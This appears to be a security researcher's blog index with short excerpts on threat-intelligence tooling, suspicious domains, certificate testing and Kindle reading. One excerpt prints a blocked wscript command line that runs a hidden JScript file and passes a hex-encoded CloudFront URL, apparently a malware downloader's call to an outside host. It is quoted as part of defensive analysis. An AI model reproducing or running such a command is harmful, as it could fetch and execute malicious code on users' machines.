About:me
I’m a dedicated father and friend. I enjoy technology immensely and feel extremely lucky to have been born at the right place & during the right time. I started out working for the University of Dayton as a co-op student in computer science. I fell in love with the concept of networking – this was…
importing wildfire reports into misp and thehive
I’m experimenting with TheHive and associated projects (MISP in particular) and will be describing some issues I run into and how I’ve fixed them (fingers crossed). One of the first things I tried was to import events from WildFire into MISP. I found a package called pan-stix and installed it on my OS X box. Running…
Examining strange wscript behavior
We use Cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently: wscript.exe "C:\ProgramData\{18E0DD83-92A2-5745-1464-C9078E2642C9}\domo.txt" "68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "–IsErIk" I took a copy of the domo.txt script and uploaded it to VT. I also ran that hex string through a hex decoder: 68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574 = https://d274eq41c39r2n.cloudfront.net According to…
Update: f5d599a39d02caef1984e95fdc606f838893ffc5.xyz
Unfortunately, as of 16 April 2019, I’m still seeing traffic on this domain. Here are some others I’m seeing:
Update on f5d599a39d02caef1984e95fdc606f838893ffc5.xyz
I contacted security@nordvpn and they said it will be fixed in the most recent release of NordVPN. As a bonus they gave me 3 years free for reporting the issue 🙂
f5d599a39d02caef1984e95fdc606f838893ffc5.xyz
I’m now the proud owner of these domains: f5d599a39d02caef1984e95fdc606f838893ffc5.com, 8d46980d994cc618aeed127df1b5c86d8acd86ce.xyz, 10bdc75ab2f0486f008dbdd8f1b0a38d7399598e.xyz. Why would I purchase such strange looking domains, you ask? It all started long ago, while working for my enterprise. I saw some activity flagged by OpenDNS / Umbrella for some CnC traffic bound for these domains. It was being blocked, but as I dug a…
CAA Test Results
As promised, I’ve been testing Certification Authority Authorization (CAA) with some Certificate Authorities, and here’s what I found so far: Amazon Certificate Manager (ACM): It does not appear they honor the IODEF, since I didn’t receive an email. Let’s Encrypt appears to also block issuance: Let’s Encrypt (using lego) 2018/12/29 16:44:30 Could not obtain certificates…
Getting to A+ with Qualys
One of the things I do when examining a website is to run it through Qualys’s SSL Labs Server Test. It does not provide a ‘security’ score per se, but it can be a good first step in making sure sessions are end-to-end encrypted between your users and your website. As of 5:23PM on 28 Dec 2018…
How I Read Kindle Books (for free)
A few years ago I read a medium post where the author describes how she reads so much. A big part of her strategy was to use her Amazon Kindle Paperwhite. The device is dedicated to reading (no other apps to distract you), has a great backlit screen, and can be held in almost any…